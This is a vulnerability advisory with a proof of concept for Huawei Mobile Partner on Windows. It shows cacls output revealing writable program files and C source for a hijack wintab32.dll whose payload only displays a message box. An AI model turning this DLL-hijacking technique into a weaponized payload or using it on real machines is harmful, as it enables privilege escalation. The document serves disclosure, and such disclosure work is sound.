# Title: Huawei Mobile Partner Multiple Vulnerabilities
# Version: 23.009.05.03.1014
# Tested on: Windows XP SP2 en
# Vendor: http://www.huawei.com/
# Software-Link: http://download-c.huawei.com/download/downloadCenter?downloadId=18474&version=16815&siteCode=worldwide
# E-Mail: osanda[at]unseen.is
# Author: Osanda Malith Jayathissa
# /!\ Author is not responsible for any damage you cause
# Use this material for educational purposes only


#1| Local Privilege Escalation 
--------------------------------

- Description
==============
Any user in the system can modify the legitimate binary to any kind of malicious executable. 
The user could also place a malicious wintab32.dll file inside the "Mobile Partner" folder and
perform DLL hijacking easily. If an attacker break into a low privilege account he could use
this application to escalate his privileges.

- Proof of Concept
===================

C:\Program Files>cacls "Mobile Partner"
C:\Program Files\Mobile Partner BUILTIN\Users:(OI)(IO)F
                                BUILTIN\Users:(CI)F
                                NT SERVICE\TrustedInstaller:(ID)F
                                NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
                                NT AUTHORITY\SYSTEM:(ID)F
                                NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
                                BUILTIN\Administrators:(ID)F
                                BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
                                CREATOR OWNER:(OI)(CI)(IO)(ID)F


C:\Program Files>cd "Mobile Partner"

C:\Program Files\Mobile Partner>cacls "Mobile Partner.exe"
C:\Program Files\Mobile Partner\Mobile Partner.exe BUILTIN\Users:F
                                                   BUILTIN\Users:(ID)F
                                                   NT AUTHORITY\SYSTEM:(ID)F
                                                   BUILTIN\Administrators:(ID)F




#2| Dll Hijacking Vulnerability (wintab32.dll)
-----------------------------------------------


#include <windows.h> 

BOOL WINAPI DllMain (
            HANDLE    hinstDLL,
            DWORD     fdwReason,
            LPVOID    lpvReserved)
{
    switch (fdwReason)
  {
  case DLL_PROCESS_ATTACH: owned();
  case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
  break;
  }
  return TRUE;
}

int owned() {
  MessageBox(0, "Mobile Partner DLL Hijacked\nOsanda Malith", "POC", MB_OK | MB_ICONWARNING);
}
/*EOF*/